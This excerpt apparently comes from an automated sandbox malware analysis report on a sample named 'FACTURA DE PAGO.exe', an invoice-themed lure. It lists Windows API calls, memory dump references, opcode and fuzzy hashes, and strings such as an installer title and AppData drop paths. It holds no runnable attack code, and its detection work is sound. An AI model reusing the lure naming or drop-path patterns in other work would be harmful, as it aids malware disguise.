                                                                                        • Opcode ID: 1e62087203bf6f43f0c9384ee7a624a046e3022ab191d81d5448d2709a656daf
                                                                                        • Instruction ID: 75b6af85c7b4550c46e72781509667ec0f8baecc0ee27a44b040c7e6c7b1aa08
                                                                                        • Opcode Fuzzy Hash: 1e62087203bf6f43f0c9384ee7a624a046e3022ab191d81d5448d2709a656daf
                                                                                        • Instruction Fuzzy Hash: 1FC04875B88201BAEE218B609D4AF167BA8AB60B42F258429B211E60E0C674F410DA2D
                                                                                        APIs
                                                                                        • SendMessageA.USER32(00000028,?,00000001,00403D7A), ref: 00403F57
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 3850602802-0
                                                                                        • Opcode ID: d71ad897c2f2d45ed447b95b395c8a164bb0c93204989444b513c5694a0ce339
                                                                                        • Instruction ID: 9ba269cb94747afcd00db45940492297b6475019a1e9eeef8f710f25602b24aa
                                                                                        • Opcode Fuzzy Hash: d71ad897c2f2d45ed447b95b395c8a164bb0c93204989444b513c5694a0ce339
                                                                                        • Instruction Fuzzy Hash: 71B01235684200BBFE325B00DE0DF457E62F768701F008034B300250F1C7B200A2DB29
                                                                                        APIs
                                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2D,?), ref: 004030D5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: FilePointer
                                                                                        • String ID:
                                                                                        • API String ID: 973152223-0
                                                                                        • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                                        • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                                                                        • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                                        • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,00000403), ref: 004050E5
                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 004050F4
                                                                                        • GetClientRect.USER32(?,?), ref: 00405131
                                                                                        • GetSystemMetrics.USER32(00000002), ref: 00405138
                                                                                        • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405159
                                                                                        • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040516A
                                                                                        • SendMessageA.USER32(?,00001001,00000000,?), ref: 0040517D
                                                                                        • SendMessageA.USER32(?,00001026,00000000,?), ref: 0040518B
                                                                                        • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040519E
                                                                                        • ShowWindow.USER32(00000000,?,0000001B,?), ref: 004051C0
                                                                                        • ShowWindow.USER32(?,00000008), ref: 004051D4
                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004051F5
                                                                                        • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405205
                                                                                        • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040521E
                                                                                        • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040522A
                                                                                        • GetDlgItem.USER32(?,000003F8), ref: 00405103
                                                                                          • Part of subcall function 00403F49: SendMessageA.USER32(00000028,?,00000001,00403D7A), ref: 00403F57
                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 00405246
                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0000501A,00000000), ref: 00405254
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040525B
                                                                                        • ShowWindow.USER32(00000000), ref: 0040527E
                                                                                        • ShowWindow.USER32(?,00000008), ref: 00405285
                                                                                        • ShowWindow.USER32(00000008), ref: 004052CB
                                                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052FF
                                                                                        • CreatePopupMenu.USER32 ref: 00405310
                                                                                        • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405325
                                                                                        • GetWindowRect.USER32(?,000000FF), ref: 00405345
                                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040535E
                                                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040539A
                                                                                        • OpenClipboard.USER32(00000000), ref: 004053AA
                                                                                        • EmptyClipboard.USER32 ref: 004053B0
                                                                                        • GlobalAlloc.KERNEL32(00000042,?), ref: 004053B9
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 004053C3
                                                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004053D7
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 004053F0
                                                                                        • SetClipboardData.USER32(00000001,00000000), ref: 004053FB
                                                                                        • CloseClipboard.USER32 ref: 00405401
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                        • String ID:
                                                                                        • API String ID: 590372296-0
                                                                                        • Opcode ID: 3d83c7054a3b30a9ea95d535bbc07a084d735a6ee6b89b99bed3655396955496
                                                                                        • Instruction ID: a6ce54ef4cbaee69b9623da841507b5c48c0df4ae21fd636639bbbe11a9743ae
                                                                                        • Opcode Fuzzy Hash: 3d83c7054a3b30a9ea95d535bbc07a084d735a6ee6b89b99bed3655396955496
                                                                                        • Instruction Fuzzy Hash: 8EA13871900208BFEB119FA0DD89AAE7F79FB08355F10407AFA01BA1A0C7755E51DF69
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,000003FB), ref: 004043A1
                                                                                        • SetWindowTextA.USER32(00000000,?), ref: 004043CB
                                                                                        • SHBrowseForFolderA.SHELL32(?,00428C40,?), ref: 0040447C
                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00404487
                                                                                        • lstrcmpiA.KERNEL32(Space required: ,00429868), ref: 004044B9
                                                                                        • lstrcatA.KERNEL32(?,Space required: ), ref: 004044C5
                                                                                        • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004044D7
                                                                                          • Part of subcall function 00405509: GetDlgItemTextA.USER32(?,?,00000400,0040450E), ref: 0040551C
                                                                                          • Part of subcall function 00405F9A: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\FACTURA DE PAGO.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405FF2
                                                                                          • Part of subcall function 00405F9A: CharNextA.USER32(?,?,?,00000000), ref: 00405FFF
                                                                                          • Part of subcall function 00405F9A: CharNextA.USER32(?,"C:\Users\user\Desktop\FACTURA DE PAGO.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406004
                                                                                          • Part of subcall function 00405F9A: CharPrevA.USER32(?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406014
                                                                                        • GetDiskFreeSpaceA.KERNEL32(00428838,?,?,0000040F,?,00428838,00428838,?,00000001,00428838,?,?,000003FB,?), ref: 00404595
                                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004045B0
                                                                                          • Part of subcall function 00404709: lstrlenA.KERNEL32(00429868,00429868,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404624,000000DF,00000000,00000400,?), ref: 004047A7
                                                                                          • Part of subcall function 00404709: wsprintfA.USER32 ref: 004047AF
                                                                                          • Part of subcall function 00404709: SetDlgItemTextA.USER32(?,00429868), ref: 004047C2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                        • String ID: A$C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian$Space required:
                                                                                        • API String ID: 2624150263-1533186396
                                                                                        • Opcode ID: 92617ce1ab210426147f8d25d609736ba8401d1a6e22c2ed364add3f88eda8c7
                                                                                        • Instruction ID: ab5132907fc5b2f665edfad9f17b3ca32a66d27d09768481e079f0ca797b6646
                                                                                        • Opcode Fuzzy Hash: 92617ce1ab210426147f8d25d609736ba8401d1a6e22c2ed364add3f88eda8c7
                                                                                        • Instruction Fuzzy Hash: 07A194B1900209ABDB11AFA2CC45AAF77B8EF85314F10843BF601B62D1D77C8941CB69
                                                                                        APIs
                                                                                        • CoCreateInstance.OLE32(00407514,?,00000001,00407504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020DD
                                                                                        • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00407504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402189
                                                                                        Strings
                                                                                        • C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Kinna, xrefs: 0040211D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharCreateInstanceMultiWide
                                                                                        • String ID: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Kinna
                                                                                        • API String ID: 123533781-4293336683
                                                                                        • Opcode ID: b8ee83f4a2e520ff4dab12eb385b74956a589b44baa30f4280110cf77b52f418
                                                                                        • Instruction ID: 202bff00353f62e800299527826cf24c9a9ce8e01df6a73eade79aa1dd8fb932
                                                                                        • Opcode Fuzzy Hash: b8ee83f4a2e520ff4dab12eb385b74956a589b44baa30f4280110cf77b52f418
                                                                                        • Instruction Fuzzy Hash: 16512775A00208BFCF10DFA4CD88A9DBBB5BF48318F20856AF615EB2D1DA799941CB14
                                                                                        APIs
                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402697
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFindFirst
                                                                                        • String ID:
                                                                                        • API String ID: 1974802433-0
                                                                                        • Opcode ID: fcbf5a8c9ec62e423337e2823bce3077c6823eab4788f95c2f9143772be47a2f
                                                                                        • Instruction ID: 3dffafe4ea1a5cbb8d5ba181f96d08faa62a405c2aca3b81b81ef469795ec413
                                                                                        • Opcode Fuzzy Hash: fcbf5a8c9ec62e423337e2823bce3077c6823eab4788f95c2f9143772be47a2f
                                                                                        • Instruction Fuzzy Hash: 7AF0A0326081049FE701EBA49949AEEB7789F21324F60057BE241A21C1D7B84985AB3A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e604220aa4cc57a0d507a3eee92e1260e78aef2c865a073fe0bf8dde490b4c6a
                                                                                        • Instruction ID: 52966d4a0c143cd855de3d8d32e2f948802446bd43c2bd9d1e79afe7cfa9a62c
                                                                                        • Opcode Fuzzy Hash: e604220aa4cc57a0d507a3eee92e1260e78aef2c865a073fe0bf8dde490b4c6a
                                                                                        • Instruction Fuzzy Hash: D1E19B71901709DFDB24CF58C890BAABBF5FB44305F15882EE497A72D1D378AA91CB14
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c5f7cd6dd9e448d1ceba1cbc86ba17909bb361cdcfc346b133718b62247df967
                                                                                        • Instruction ID: 28dd1b742c6822d911ebb92dd847779981f1f79bff0408386317dd500df5852d
                                                                                        • Opcode Fuzzy Hash: c5f7cd6dd9e448d1ceba1cbc86ba17909bb361cdcfc346b133718b62247df967
                                                                                        • Instruction Fuzzy Hash: 53C12971A0021A8BCF18CF68D5905EEB7B2FF99314F26827AD85677380D734A952CF94
                                                                                        APIs
                                                                                        • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004040E8
                                                                                        • GetDlgItem.USER32(00000000,000003E8), ref: 004040FC
                                                                                        • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040411A
                                                                                        • GetSysColor.USER32(?), ref: 0040412B
                                                                                        • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040413A
                                                                                        • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404149
                                                                                        • lstrlenA.KERNEL32(?), ref: 0040414C
                                                                                        • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040415B
                                                                                        • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404170
                                                                                        • GetDlgItem.USER32(?,0000040A), ref: 004041D2
                                                                                        • SendMessageA.USER32(00000000), ref: 004041D5
                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 00404200
                                                                                        • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404240
                                                                                        • LoadCursorA.USER32(00000000,00007F02), ref: 0040424F
                                                                                        • SetCursor.USER32(00000000), ref: 00404258
                                                                                        • ShellExecuteA.SHELL32(0000070B,open,0042D3A0,00000000,00000000,00000001), ref: 0040426B
                                                                                        • LoadCursorA.USER32(00000000,00007F00), ref: 00404278
                                                                                        • SetCursor.USER32(00000000), ref: 0040427B
                                                                                        • SendMessageA.USER32(00000111,00000001,00000000), ref: 004042A7
                                                                                        • SendMessageA.USER32(00000010,00000000,00000000), ref: 004042BB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                        • String ID: (@@$N$Space required: $open
                                                                                        • API String ID: 3615053054-3333049044
                                                                                        • Opcode ID: 7868d9df4ae1d674ab0cf3f1043cffc922edae777938ca354114bc27cd0f8479
                                                                                        • Instruction ID: c92d02d703ef172067c6e48558b1c194508f37b8d1d7228abd04d5231d4a861f
                                                                                        • Opcode Fuzzy Hash: 7868d9df4ae1d674ab0cf3f1043cffc922edae777938ca354114bc27cd0f8479
                                                                                        • Instruction Fuzzy Hash: 5461D3B1A40209BFEB109F21DC45F6A7B68FB44755F10807AFB00BA2D1C7B8A951CB98
                                                                                        APIs
                                                                                        • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                                                        • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                        • DrawTextA.USER32(00000000,Trehagen Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                        • String ID: F$Trehagen Setup
                                                                                        • API String ID: 941294808-1307836353
                                                                                        • Opcode ID: 743dd018db8a108fdfb55826faff2fb237305abb1c3a72422579a1c27d61dc24
                                                                                        • Instruction ID: 9af9226455e7fa8211e54ab4aa6b8deb1f4adf461e7c9b231a43246ca388c9df
                                                                                        • Opcode Fuzzy Hash: 743dd018db8a108fdfb55826faff2fb237305abb1c3a72422579a1c27d61dc24
